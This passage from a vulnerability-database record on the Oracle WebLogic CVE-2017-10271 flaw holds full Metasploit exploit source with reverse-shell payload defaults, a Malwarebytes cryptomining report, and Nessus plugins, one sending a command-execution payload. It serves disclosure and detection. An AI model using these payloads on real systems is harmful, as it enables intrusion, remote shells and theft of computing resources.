Exploit::CheckCode::Safe\n # end\n # end\n #\n # stop_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => 
normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb"}, {"lastseen": "2020-10-15T08:08:49", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.\n", "published": "2019-04-26T01:03:17", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE - AsyncResponseService", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' =>\n [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2017-10271'],\n ['CNVD-C', '2019-48814'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 
'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],\n ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']\n ],\n 'Privileged' => false,\n 'Platform' => %w{ unix win solaris },\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\n ],\n [ 'Solaris',\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => '2019-04-23'))\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => {'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?(\"<faultcode>env:Client</faultcode>\")\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status(\"The target returned a non-vulnerable HTTP code\")\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status(\"The target did not respond in an expected way\")\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def 
exploit\n print_status(\"Generating payload...\")\n case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })\n when 'Unix','Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %Q|<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"|\n soap_payload << %Q|xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"|\n soap_payload << %Q|xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">|\n soap_payload << %Q|<soapenv:Header>|\n soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|\n soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|\n soap_payload << %Q|<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">|\n soap_payload << %Q|<void class=\"java.lang.ProcessBuilder\">|\n soap_payload << %Q|<array class=\"java.lang.String\" length=\"3\">|\n soap_payload << %Q|<void index=\"0\">|\n soap_payload << %Q|<string>#{string0_cmd}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"1\">|\n soap_payload << %Q|<string>#{string1_param}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"2\">|\n soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|\n #soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</array>|\n soap_payload << %Q|<void method=\"start\"/>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</work:WorkContext>|\n soap_payload << %Q|</soapenv:Header>|\n soap_payload << %Q|<soapenv:Body>|\n soap_payload << %Q|<asy:onAsyncDelivery/>|\n soap_payload << %Q|</soapenv:Body>|\n soap_payload << %Q|</soapenv:Envelope>|\n\n print_status(\"Sending payload...\")\n\n begin\n res 
= send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => {'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, \"The target forcibly closed the connection, and is likely not vulnerable.\")\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, \"No response from host\")\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply,\"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb"}], "malwarebytes": [{"lastseen": "2018-02-26T16:50:59", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271"], "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. 
Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. 
In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. 
Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. 
Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. 
The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. 
While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn addition to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and a weakness, in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. 
This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. 
Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some respects, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be underestimated. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-02-26T16:08:03", "published": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "type": "malwarebytes", "title": "The state of malicious cryptomining", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-02-01T07:39:34", "description": "The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT 
endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.", "edition": 34, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-12-28T00:00:00", "title": "Oracle WebLogic WSAT Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-10271"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2017-10271\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n script_summary(english:\"Sends an HTTP POST request and looks for DNS response\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. 
An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... 
although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 
and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-01T04:58:07", "description": "The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities", "edition": 34, "cvss3": {"score": 9.9, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H"}, "published": "2017-10-18T00:00:00", "title": "Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-10334", "CVE-2017-10152", "CVE-2017-10271", "CVE-2017-10352", "CVE-2017-10336"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server", "cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "href": "https://www.tenable.com/plugins/nessus/103935", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103935);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-10152\",\n 
\"CVE-2017-10271\",\n \"CVE-2017-10334\",\n \"CVE-2017-10336\",\n \"CVE-2017-10352\"\n );\n script_bugtraq_id(101304, 101351, 101392);\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)\");\n script_summary(english:\"Checks for the patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e07fa0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 